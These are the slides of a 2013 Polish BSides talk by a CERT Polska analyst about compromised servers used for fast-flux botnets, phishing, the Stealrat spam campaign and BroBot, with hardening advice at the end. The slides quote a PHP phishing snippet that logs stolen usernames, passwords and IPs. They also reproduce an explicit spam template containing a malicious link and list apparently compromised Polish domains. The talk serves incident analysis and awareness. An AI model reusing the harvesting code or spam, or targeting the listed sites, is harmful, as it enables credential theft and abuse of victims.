Nie wlaczaj sie! - Zabezpiecz sie!

SecurityBSides Warszawa 2013 - Maciej Kotowicz / @maciekkotowicz

lokalhost.pl/talks/sbswaw2013/

Shameless plug/

Przypomnienie




ctf.securitybsides.pl

Samolans




  • oper @ CERT Polska
  • DragonSector CTF Team
  • Student ii@Uwr
  • Wykladowca ii@Uwr
  • Bezpiecznik @ WCSS
  • Gadacz to tu to tam
  • Reverse Engineer/Exploit dev etc..etc..

Sieci Fust-Flux

Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network (...) hosts acting as proxies. (...) The basic idea behind Fast flux is to have numerous IP addresses associated with a single fully qualified domain name, where the IP addresses are swapped in and out with extremely high frequency, through changing DNS records.

Sieci Fust-Flux

Lets do it!



  • Skad wziasc duzo hostow?
  • pwn all teh things!
  • root:root
  • maszyny testowe/stare vpsy/nowe vpsy

Sieci Fust-Flux

A co to ma wsponego ze mna?

Sieci Fust-Flux

Gdzie sie podzial moj bandwith?/Did i get pwnd?

rutyna!


  • stuff w /tmp, /dev/shm, /var/tmp/, /root
  • `ukryte` katalogi
  • nginx jako proxy - /usr/locale/nginx - port 80!

Sieci Fust-Flux

Mom may be a reasearcher?



  • zeustracker
  • domeny z niskim ttl
  • domeny z wieloma ipkami
  • ...
  • wykaz sie sam{a} ;]

Deface

Nie taki slodki jak go maluja

Deface

Deface^W^W^W^WPhishing

Phising


				      <?
$username1 = $_POST['client_id'];
$username2 = $_POST['password'];
$ip= getenv("REMOTE_ADDR");
$out = fopen("cont.txt", "a");
if (!$out) { print("Could not append to file"); exit; }
fwrite($out,"user: "."$username1\r\n");
fwrite($out,"pass: "."$username2\r\n");
fwrite($out,"$ip "."\r\n");
fwrite($out,"-------------------------------------\r\n");

Stealrat

SPAM prosto i bezbolesnie

Kampania/Botnet majaca na celu rozsylanie spamu glowni, porno/viagra -- w wiekoszsci zdjeta przez abuse.ch

Stealrat

SPAM prosto i bezbolesnie

  • . first pwn - .exe
  • . second pwn - win-down
  • . third pwn - send spam

Stealrat

numerki

  • > 40k spamerow
  • > 12k emaili
  • ~150 templatow 
<USER>erika_copeland</USER>
<NAME>"Erika Copeland"</NAME>
<SUBJ> Great Amateur Creampie with College Babe</SUBJ>
<SBODY>
<p><a href="http://www.nursesfornursing.com/components/com_content/aHOA.html">Muscular pimp fucking ebony sluts</a></p>
give us a few minutes well be
 right back . . . Two  quick  thuds,. two blows sounded and Iron John staggered.  Floydiceberg smiles on his lips.whispered. Back against the wall.examination
. Floyd had dug a small flute out of his pack and played
</SBODY>

Mass pwnage - BroBot


				      

				    
akademiaprzedszkolaka_wloclawek_pl
autyzmopole_pl
bodegassantarufina_pl
butikcityglam_pl
_bydgoskimarzec_pl
cis_wieprz_pl
domatrypin_pl
eco_investment_pl
erpebud_pl
fundacjafestiwal_pl
kps_siedlce_pl
_logopedamedialny_wroclaw_pl
motorpol_legnica_pl
odnovazabrze_pl
raczki_pl
retroplock_pl
sklep_klinkier_pl
startwprzyszlosc_pl
tax_perfect_pl
toc_mscdn_pl
travelest_com_pl
tur_bud_com_pl
wkl310sobol_pl
zkielcnakoroneziemi_pl
zstm_pl

A moze by tak botnecik?

Podsumowanie

Nie domykajmy drzwi, zostawmy nie zalatane dziury
Moze nadejda pwn, zapelni sie bandwitch pusty
Nie domykajmy drzwi, moze niebiscy wleca
Czekamy na ten swit, moze wyrok nas oswieci
Nie domykajmy drzwi, zawrocmy porzucone slowa
Nie domykajmy drzwi, moze zaczniemy zyc od nowa...
Piwo za podanie orginalengo utworu,nazwe i wykonawce

Co robic, jak zyc?



  • spojnosc plikow
  • odseparowane srodwiska testowe
  • hasla!!!!!11111ooenoene
  • pathe!!!!1111ooeoeneone
  • skontaktuj sie z lekarzem lub farmaceuta (nie CERT'em! ;])

Q & A

cert.pl

rekrutacja@nask.pl